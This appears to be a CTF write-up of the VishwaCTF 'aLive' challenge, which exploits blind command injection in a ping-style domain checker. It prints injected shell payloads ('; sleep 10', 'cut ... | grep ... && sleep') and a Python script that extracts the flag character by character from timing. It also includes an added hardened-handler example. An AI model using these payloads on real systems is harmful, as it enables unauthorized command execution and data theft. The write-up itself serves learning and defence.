(Write-up) Vishwactf: aLive

💻Problem

We have been provided with a link to a website that holds the flag.
The site is simple: a single input that takes a domain to check (screenshot not preserved).
It's very simple, right? 😈

🤔Examine

I tried entering google.com, as their example suggested, and the result (screenshot not preserved) looked just as simple 😗
Okay, let's move on. If it looks this simple, the backend probably runs the ping command (where we can't see it). ⇒ If that's true, it may contain CMDi (Command Injection) ⇒ We can exploit it.
So, I tried entering google.com; sleep 10 .
Ohhh, the website took 10 seconds to respond. ⇒ The hypothesis was correct.
I guess the flag is stored in a file on the system, and our mission is to find a way to read it.
But we have nowhere to display output on this website. So what do we do? (Let's deal with this in the next part)
Ok, I will use this to extract the FLAG.
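The backend the write-up suspects (a ping wrapped in a shell string) next to the form a developer should ship instead. This is an added example, not the challenge's code or the author's; the function names, the hostname regex and the timeout value are assumptions.

```python
import re
import subprocess

# Hostname allowlist (assumed, not the challenge's code): labels of letters, digits
# and hyphens separated by dots, no leading/trailing hyphen, no shell metacharacters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def unsafe_ping_command(domain: str) -> str:
    """The pattern the write-up suspects: untrusted input pasted into a shell string.
    Run with shell=True, 'google.com; sleep 10' executes sleep as a second command,
    which is exactly the timing signal the write-up measures."""
    return "ping -c 1 " + domain


def validate_hostname(domain: str) -> bool:
    """Accept only a plain hostname or dotted IPv4 literal; reject everything else."""
    return HOSTNAME_RE.match(domain) is not None


def safe_ping_argv(domain: str) -> list:
    """Build the command as an argv list: no shell is involved, so ';', '|' and '&&'
    would be ordinary characters inside one argument, and validation rejects them
    before that point anyway."""
    if not validate_hostname(domain):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", domain]


def is_alive(domain: str, timeout: float = 5.0) -> bool:
    """Hardened handler: validated argv, no shell, and a timeout so a slow or
    hanging ping cannot tie up the worker."""
    try:
        proc = subprocess.run(safe_ping_argv(domain), capture_output=True, timeout=timeout)
    except (ValueError, subprocess.TimeoutExpired):
        return False
    return proc.returncode == 0
```

With the argv form, the sleep-based probe from this write-up never reaches a shell, and the rejected request is the event worth logging.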

🚩Let’s go

For starters, I'm assuming the flag file is in the current directory.
Ok, back to the problem of not seeing output. To solve it we tried using curl to send the output out, but we failed: it seems outbound internet access is blocked.
So we thought about using the sleep command to brute-force the flag, one character at a time.
Because the flag starts with VishwaCTF, I tried
google.com; cut -c1-9 * | grep "VishwaCTF" && sleep 10
This command executed and the website took 10 seconds to respond, so the file containing the flag is in the current directory (cut -c1-9 takes the first 9 characters of every file, grep succeeds only if one of them starts with VishwaCTF, and sleep runs only on that success).
So we wrote a Python program to brute-force the flag:
from requests import post

URL = "<URL>"  # change this to the challenge URL
timeSleep = 1  # seconds the injected sleep delays a matching response
flag = ""
currentChar = 48
index = 1

while True:
    # candidate characters: 0-9 (and ':'), A-Z, a-z (and '{'), '}' and '_'
    if (currentChar in range(48, 59) or currentChar in range(65, 91)
            or currentChar in range(97, 124) or currentChar == 125 or currentChar == 95):
        # compare the first `index` characters of every file with the guessed prefix;
        # grep only succeeds on a match, and only then does the sleep run
        tar = ('google.com; cut -c1-' + str(index) + ' * | grep "' + flag
               + chr(currentChar) + '" && sleep ' + str(timeSleep))
        res = post(URL, data={"domain": tar})
        if res.elapsed.total_seconds() <= timeSleep:
            currentChar += 1          # no delay: wrong guess, try the next character
        else:
            flag += chr(currentChar)  # delay: character confirmed
            print(flag)
            currentChar = 48
            index += 1
    elif currentChar > 128:
        break                         # no candidate matched: end of the flag
    else:
        currentChar += 1

print("==> Flag: " + flag)
(The code above was written by someone who is still inexperienced and has not been optimized; you can optimize it to do better 😝)
Run the above code and … Waiting is happiness!!!
💡 VishwaCTF{b1inD_cmd}